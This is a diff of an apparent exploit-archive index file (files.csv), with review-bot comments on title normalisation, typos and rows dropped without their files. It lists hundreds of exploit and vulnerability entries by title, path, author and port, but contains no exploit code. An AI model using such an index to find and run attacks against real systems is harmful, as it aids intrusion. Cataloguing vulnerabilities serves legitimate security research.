 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 (LIST command) Format String DoS Exploit",2009-09-10,corelanc0d3r,windows,dos,0
 9623,platforms/php/webapps/9623.txt,"Advanced Comment System 1.0 - Multiple RFI Vulnerabilities",2009-09-10,Kurd-Team,php,webapps,0
 9624,platforms/windows/local/9624.py,"KSP 2009R2 (m3u) Universal Local Buffer Overflow Exploit (SEH)",2009-09-10,hack4love,windows,local,0
@@ -9096,19 +9096,19 @@ id,file,description,date,author,platform,type,port
 9635,platforms/php/webapps/9635.txt,"Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability",2009-09-10,"EA Ngel",php,webapps,0
 9636,platforms/php/webapps/9636.txt,"An image gallery 1.0 (navigation.php) Local Directory Traversal Vuln",2009-09-10,"ThE g0bL!N",php,webapps,0
 9637,platforms/php/webapps/9637.txt,"T-HTB Manager 0.5 - Multiple Blind SQL Injection Vulnerabilities",2009-09-10,"Salvatore Fresta",php,webapps,0
-9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
+9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (sql/xss) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
 9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
-9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
+9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0
 9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN Remote Reboot 
Exploit",2009-09-11,crashbrz,hardware,dos,0
 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor (maincat_id) Remote SQL Injection Vulnerability",2009-09-11,noname,php,webapps,0
 9648,platforms/php/webapps/9648.txt,"Joomla Hotel Booking System - XSS/SQL Injection Multiple Vulnerabilities",2009-09-11,K-159,php,webapps,0
 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 Arbitrary Source Code Disclosure Vuln",2009-09-11,Dr_IDE,windows,remote,0
-9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure #2",2009-09-11,Dr_IDE,windows,remote,0
+9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Remote Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0
 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0
 9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80
 9653,platforms/php/webapps/9653.txt,"Joomla Component Turtushout 0.11 (Name) SQL Injection Vulnerability",2009-09-14,jdc,php,webapps,0
@@ -9189,11 +9189,11 @@ id,file,description,date,author,platform,type,port
 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging Alert Evasion, Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0
 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0
-9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC #2",2009-09-21,Dr_IDE,windows,dos,0
+9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0
 9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80
 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0
 9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler exploit",2009-09-29,bruiser,windows,remote,0
-9803,platforms/windows/remote/9803.html,"Multiple EMC products utilizing keyhelp.ocx 1.2.312",2009-09-29,pyrokinesis,windows,remote,0
+9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0
 9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server <= 5.8.0 DoS",2009-11-10,zhangmc,windows,dos,21
 9805,platforms/windows/remote/9805.html,"Oracle Document Capture BlackIce DEVMODE exploit",2009-09-29,pyrokinesis,windows,remote,0
 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 remote file creation PoC",2009-09-29,pyrokinesis,windows,dos,0
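Review bot: The new 9803 description carries the misspelling `ApllicationXtender` for the EMC Documentum ApplicationXtender product, apparently copied from the 10008 row that a later hunk in this diff removes. Since the rename exists to make the row findable by product name, the typo defeats the purpose; the field should read `"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApplicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit"`. The 9734 change in the same hunk (`#2` to `(2)`) matches the numbering convention the rest of the commit applies.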
@@ -9216,7 +9216,6 @@ id,file,description,date,author,platform,type,port
 9824,platforms/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0
 9825,platforms/php/webapps/9825.txt,"e107 0.7.16 Referer header xss",2009-09-24,MustLive,php,webapps,0
 9826,platforms/php/webapps/9826.txt,"MindSculpt CMS SQL Injection",2009-09-24,kaMitEz,php,webapps,0
-9827,platforms/multiple/webapps/9827.py,"html2ps 1.0 beta5 file disclosure",2009-09-24,epiphant,multiple,webapps,0
 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection and xss",2009-09-23,"Alexey Sintsov",php,webapps,0
 9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80
 9830,platforms/php/webapps/9830.txt,"Cour Supreme SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
@@ -9235,7 +9234,6 @@ id,file,description,date,author,platform,type,port
 9843,platforms/multiple/remote/9843.txt,"Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0
 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
 9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0
-9846,platforms/php/webapps/9846.txt,"Endonessia CMS 8.4 Loccal File Inclusion",2009-11-04,s4r4d0,php,webapps,0
 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0
@@ -9286,7 +9284,7 @@ id,file,description,date,author,platform,type,port
 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80
 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 xss, SQL injection",2009-10-20,"Amol Naik",php,webapps,0
 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection Vulnerability",2009-10-30,"Securitylab Research",asp,webapps,0
-9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 - 10.2.0.4 AUTH_SESSKEY length validation exploit",2009-10-30,"Dennis Yurichev",windows,remote,1521
+9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 - 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow Vulnerability",2009-10-30,"Dennis Yurichev",windows,remote,1521
 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0
 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0
 9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0
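Review bot: The renamed 9905 description now ends in `Remote Buffer Overflow Vulnerability` although the row points at a compiled exploit (`9905.cpp`) and the old text called it an exploit; elsewhere in this diff the code entries end in `Exploit` and the advisory-only `.txt` entries in `Vulnerability` (compare 9644 with 9638 in an earlier hunk). The wording looks inherited from the 10080 advisory row removed in a later hunk, which shares the author and port 1521; if that row was folded into this one, keeping the type distinction with `- AUTH_SESSKEY Length Validation Remote Buffer Overflow Exploit` would let readers tell code from write-ups by the title alone.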
@@ -9377,7 +9375,6 @@ id,file,description,date,author,platform,type,port
 10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445
 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0
 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0
-10008,platforms/windows/remote/10008.txt,"EMC Captiva QuickScan Pro 4.6 sp1 and EMC Documentum ApllicationXtender Desktop 5.4",2009-09-30,pyrokinesis,windows,remote,0
 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0
 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
@@ -9443,7 +9440,6 @@ id,file,description,date,author,platform,type,port
 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2009-11-09,"Ralf Haferkamp",multiple,dos,389
 10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext local PoC",2009-10-02,mu-b,osx,local,0
 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser remote command execution",2009-10-01,pyrokinesis,windows,remote,0
-10080,platforms/windows/remote/10080.txt,"Oracle Network Authentication - Remote Buffer Overflow Vulnerability",2009-11-09,"Dennis Yurichev",windows,remote,1521
 10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0
 10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0
 10083,platforms/php/remote/10083.txt,"PHP <=5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0
@@ -9482,13 +9478,13 @@ id,file,description,date,author,platform,type,port
 10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 HTML / Xss Injection",2009-11-18,SkuLL-HackeR,php,webapps,0
 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0
 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31, 4.32 HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80
-10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 Vulnerbility found Denial of Service(0day)",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80
+10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 Vulnerbility found Denial of Service (0day)",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80
 10176,platforms/windows/dos/10176.txt,"HP Openview NNM 7.53 Invalid DB Error Code Vulnerability",2009-11-17,"Core Security",windows,dos,0
 10177,platforms/php/webapps/10177.txt,"Joomla Ext. iF Portfolio Nexus SQL injection",2009-11-18,"599eme Man",php,webapps,0
 10178,platforms/php/webapps/10178.txt,"Joomla / Mambo Component com_ezine 2.1 - Remote File Include Vulnerability",2009-10-20,kaMtiEz,php,webapps,0
 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Mutliple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0
 10181,platforms/php/webapps/10181.txt,"bitrix site manager 4.0.5 - Remote File Inclusion Vulnerability",2005-06-15,"Don Tukulesto",php,webapps,0
-10182,platforms/hardware/dos/10182.py,"2wire Router <= 5.29.52 Remote DoS",2009-10-29,hkm,hardware,dos,0
+10182,platforms/hardware/dos/10182.py,"2wire Router <= 5.29.52 - Remote DoS",2009-10-29,hkm,hardware,dos,0
 10183,platforms/php/webapps/10183.php,"Joomla 1.5.12 RCE via TinyMCE - Upload Vulnerability",2009-11-19,daath,php,webapps,80
 10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0
 10185,platforms/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array 
Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0
@@ -9826,7 +9822,7 @@ id,file,description,date,author,platform,type,port
 10592,platforms/php/webapps/10592.txt,"PHPOPENCHAT 3.0.2 Cross Site Scripting AND/OR FPD",2009-12-21,Dedalo,php,webapps,0
 10593,platforms/windows/dos/10593.txt,"Winamp <= 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0
 10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Remote File Upload Vulnerability",2009-12-22,"Master Mind",php,webapps,0
-10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0
+10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow Exploit",2009-12-22,data$hack,windows,local,0
 10596,platforms/windows/local/10596.pl,"PlayMeNow Malformed (M3U) Universal XP Seh BoF",2009-12-22,"ThE g0bL!N",windows,local,0
 10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection Vulnerability",2009-12-22,Mr.Elgaarh,php,webapps,0
 10598,platforms/php/webapps/10598.txt,"deluxebb <= 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0
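Review bot: The 10171 rename in the hunk starting at `@@ -9482` only inserts a space before `(0day)` and leaves `Vulnerbility found` in the same field, so the row still will not match a search for "vulnerability" and still reads as a sentence fragment rather than a title. Given the ` - ` separator the commit applies to neighbouring rows (10182 in this hunk, 10595 in the next one), `"Baby Web Server 2.7.2 - Denial of Service (0day)"` would be the consistent form. The misspelled `Mutliple` in context row 10180 sits in the same hunk and could be swept in at the same time.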
@@ -10618,7 +10614,7 @@ id,file,description,date,author,platform,type,port
 11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0
 11615,platforms/win32/remote/11615.txt,"Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability",2010-03-02,"Maurycy Prodeus ",win32,remote,0
 11616,platforms/php/webapps/11616.txt,"My Little Forum contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0
-11617,platforms/windows/dos/11617.txt,"Opera + Mozilla Firefox 3.6 - Long String Crash (0day) Exploit",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0
+11617,platforms/windows/dos/11617.txt,"Opera + Mozilla Firefox 3.6 - Long String Crash Exploit (0day)",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0
 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow Exploit",2010-03-02,"S2 Crew",windows,remote,0
 11619,platforms/php/webapps/11619.txt,"Uiga Church Portal index.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0
 11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Shell Upload Vulnerability",2010-03-03,indoushka,php,webapps,0
@@ -11467,7 +11463,7 @@ id,file,description,date,author,platform,type,port
 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection exploit",2010-05-13,Cryptovirus,php,webapps,0
-12587,platforms/linux/remote/12587.c,"wftpd server 3.30 Multiple Vulnerabilities(0day)",2010-05-13,"fl0 fl0w",linux,remote,21
+12587,platforms/linux/remote/12587.c,"wftpd server 3.30 Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
 12588,platforms/linux/dos/12588.txt,"Samba Multiple DoS Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0
 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection Vulnerability",2010-05-13,c4uR,php,webapps,0
 12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0
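Review bot: The 12587 change in this hunk only fixes the missing space before `(0day)` and leaves the product and the finding without the ` - ` separator that the rest of the commit inserts (11617 in the previous hunk, 14600 and 14854 in later ones), so the row still does not follow the title pattern being normalised. `"wftpd server 3.30 - Multiple Vulnerabilities (0day)"` would bring it in line; the trailing `(0day)` placement already agrees with 11617 and 14600.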
@@ -11598,7 +11594,7 @@ id,file,description,date,author,platform,type,port
 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
 12737,platforms/php/webapps/12737.txt,"Simpel Side - (index2.php) SQL Injection Vulnerability",2010-05-25,MN9,php,webapps,0
-12740,platforms/windows/dos/12740.py,"POC - SEH control (0day) of Webby webserver",2010-05-25,m-1-k-3,windows,dos,0
+12740,platforms/windows/dos/12740.py,"Webby Webserver - POC SEH control (0day)",2010-05-25,m-1-k-3,windows,dos,0
 12741,platforms/windows/dos/12741.py,"Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service",2010-05-25,Dr_IDE,windows,dos,0
 12743,platforms/php/webapps/12743.txt,"web5000 (page_show) SQL Injection Vulnerability",2010-05-25,"BLack Revenge",php,webapps,0
 12744,platforms/php/webapps/12744.txt,"Webit Cms SQL Injection Vulnerability",2010-05-25,CoBRa_21,php,webapps,0
@@ -12288,9 +12284,8 @@ id,file,description,date,author,platform,type,port
 14001,platforms/multiple/webapps/14001.txt,"InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0
 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0
-14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload",2010-06-23,"Ivan Huertas",multiple,webapps,0
+14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0
 14005,platforms/php/webapps/14005.txt,"2daybiz MLM Script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0
-14006,platforms/multiple/webapps/14006.txt,"InterScan Web Security 5.0 - Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0
 14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0
 14008,platforms/php/webapps/14008.txt,"2daybiz matrimonial script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0
 14009,platforms/php/webapps/14009.txt,"2daybiz Freelance script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0
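Review bot: Folding 14006 into the 14004 row removes the only index entry for `platforms/multiple/webapps/14006.txt`, and nothing in this hunk shows that file being deleted or its content merged into 14004.txt; if it stays in the tree it becomes an orphan that any tooling walking files.csv will never reach. The same question applies to the rows dropped by earlier hunks in this diff (9827, 9846, 10008 and 10080). Either remove or merge the corresponding files in the same commit, or keep a row for each file that remains.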
@@ -12765,7 +12760,7 @@ id,file,description,date,author,platform,type,port
 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability",2010-08-10,"Oh Yaw Theng",windows,dos,0
 14598,platforms/php/webapps/14598.txt,"Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities",2010-08-10,"Salvatore Fresta",php,webapps,0
 14599,platforms/windows/remote/14599.txt,"AoA Audio Extractor Remote ActiveX SEH JIT Spray Exploit (ASLR+DEP Bypass)",2010-08-10,Dr_IDE,windows,remote,0
-14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - (0Day) Remote Exploit",2010-08-10,sud0,windows,remote,0
+14600,platforms/windows/remote/14600.html,"SopCast 3.2.9 - Remote Exploit (0day)",2010-08-10,sud0,windows,remote,0
 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 SEH buffer overflow PoC",2010-08-10,anonymous,windows,dos,0
 14602,platforms/multiple/remote/14602.txt,"Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability",2010-08-10,kripthor,multiple,remote,0
 14604,platforms/windows/remote/14604.py,"Easy FTP - BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands",2010-08-10,"Rabih Mohsen",windows,remote,0
@@ -12957,36 +12952,36 @@ id,file,description,date,author,platform,type,port
14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0
14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0
14852,platforms/windows/dos/14852.txt,"leadtools activex common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0
-14853,platforms/windows/remote/14853.py,"MOAUB #1 - Adobe Acrobat Reader and Flash Player “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0
-14854,platforms/php/webapps/14854.py,"MOAUB #1 - Cpanel PHP Restriction Bypass Vulnerability 0day",2010-09-01,Abysssec,php,webapps,0
+14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0
+14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0
14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0
14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal vulnerability",2010-09-01,chr1x,windows,remote,0
14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer ActiveX Denial of Service Vulnerability",2010-09-01,d3b4g,windows,dos,0
14860,platforms/php/webapps/14860.txt,"PHP Joke Site Software (sbjoke_id) SQL Injection Vulnerability",2010-09-01,"BorN To K!LL",php,webapps,0
14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0
14867,platforms/php/webapps/14867.txt,"vbShout 5.2.2 - Remote/Local File Inclusion Vulnerability",2010-09-02,fred777,php,webapps,0
-14869,platforms/windows/dos/14869.py,"MOAUB #2 - Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0
-14870,platforms/asp/webapps/14870.txt,"moaub #2 - rainbowportal Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0
+14869,platforms/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution Vulnerability",2010-09-02,Abysssec,windows,dos,0
+14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0
14873,platforms/win32/shellcode/14873.asm,"Shellcode Checksum Routine",2010-09-02,dijital1,win32,shellcode,0
14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0
14876,platforms/php/webapps/14876.txt,"Shop a la Cart Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0
14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0
-14879,platforms/asp/webapps/14879.txt,"moaub #3 - visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0
+14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0
14882,platforms/windows/dos/14882.txt,"FFDshow SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0
14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0
14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,R00t[ATI],php,webapps,0
14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0
-14886,platforms/windows/remote/14886.py,"MOAUB #4 - Movie Maker Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0
-14887,platforms/php/webapps/14887.txt,"moaub #4 - syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0
+14886,platforms/windows/remote/14886.py,"Movie Maker- Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0
+14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0
14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0
14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS (sid) Blind SQL Injection Vulnerability",2010-09-04,"BorN To K!LL",php,webapps,0
14892,platforms/windows/dos/14892.py,"VLC Media Player < 1.1.4 (.xspf) smb:// URI Handling Remote Stack Overflow PoC",2010-09-04,s-dz,windows,dos,0
14893,platforms/php/webapps/14893.txt,"php classifieds 7.3 - Remote File Inclusion Vulnerability",2010-09-04,alsa7r,php,webapps,0
14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection Exploit",2010-09-05,"Ptrace Security",php,webapps,0
-14895,platforms/windows/remote/14895.py,"MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0
+14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0
14896,platforms/php/webapps/14896.txt,"ijoomla magazine 3.0.1 - Remote File Inclusion Vulnerability",2010-09-05,LoSt.HaCkEr,php,webapps,0
14897,platforms/php/webapps/14897.txt,"chillycms 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0
-14898,platforms/asp/webapps/14898.txt,"moaub #5 - ifnuke Multiple Vulnerabilities 0day",2010-09-05,Abysssec,asp,webapps,0
